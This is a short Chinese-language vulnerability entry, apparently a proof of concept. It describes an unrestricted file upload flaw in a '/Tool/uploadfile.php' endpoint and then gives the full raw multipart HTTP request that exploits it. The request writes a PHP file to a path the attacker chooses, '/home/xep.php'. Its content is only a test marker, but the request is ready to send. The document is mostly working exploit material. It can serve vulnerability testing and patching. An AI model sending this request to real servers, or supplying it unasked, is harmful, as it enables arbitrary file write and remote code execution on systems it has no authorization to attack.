漏洞描述
文件上传漏洞发生在应用程序允许用户上传文件的功能中,如果上传功能未能正确地验证和限制上传文件的类型和内容,攻击者可能利用此漏洞上传恶意文件,如包含可执行代码的脚本文件,从而在服务器上执行任意命令,控制或破坏系统。
POST /Tool/uploadfile.php HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Content-Length: 304
Content-Type: multipart/form-data; boundary=f44491ed37caac710dc735c0f62916b9
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
Origin: http://[REDACTED]
Referer: http://[REDACTED]/Tool/uploadfile.php
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
--f44491ed37caac710dc735c0f62916b9
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream
testxep
--f44491ed37caac710dc735c0f62916b9
Content-Disposition: form-data; name="txt_path"
/home/xep.php
--f44491ed37caac710dc735c0f62916b9--